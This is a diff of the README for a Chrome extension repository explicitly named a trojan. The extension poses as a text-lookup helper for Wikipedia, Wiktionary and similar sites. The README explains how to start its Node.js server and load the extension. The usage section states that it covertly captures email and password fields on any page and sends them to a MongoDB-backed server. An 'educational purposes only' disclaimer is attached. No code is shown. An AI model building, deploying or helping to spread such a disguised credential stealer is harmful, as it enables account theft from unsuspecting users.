redkirti/trojan_chrome_extension/README.md

      node server.js
      ```

+3. **Load the extension in your browser:**
+   - Open your browser and go to the extensions page (usually `chrome://extensions/` for Chrome).
+   - Enable "Developer mode."
+   - Click "Load unpacked" and select the directory containing the extension's files.

+4. **Start using the extension:**
+   - Select any text on a webpage, and the extension will offer options to fetch related information from Wikipedia, Wiktionary, etc.
+   - If the page contains email and password input fields, the extension will covertly capture and send the data to the server.

 ## Usage

-1. **Data Fetching**: Highlight text on any webpage.
-A pop-up will appear with options to search Wikipedia, Wiktionary, Dictionary.com, and WikiNews.
+- **Fetching Information:** After selecting text on a webpage, choose the desired source (Wikipedia, Wiktionary, Dictionary.com, or WikiNews) to fetch related information.
-2. **Credential Logging**: When the user inputs an email and password on any webpage, the extension will capture and send these credentials to the MongoDB database via the Node.js server.
+- **Credential Capture:** If the page includes input fields for email and password, the extension captures the data upon submission and sends it to the configured server.

-## Security Note
+## Disclaimer

-This extension includes functionality that captures user credentials.
-Usage of this code should be in compliance with ethical guidelines and local laws.
-Unauthorized capture of user credentials without consent is illegal and unethical.
+This extension is for educational purposes only.
+Capturing user credentials without consent is illegal and unethical.
+Ensure that you have the appropriate permissions before deploying or testing this extension.

 ## License
 This project is licensed under the MIT License.
-See the [LICENSE](LICENSE) file for details.

-## Disclaimer

-This project is for educational purposes only.
-The author does not condone or promote the unauthorized use of this software for illegal activities.

----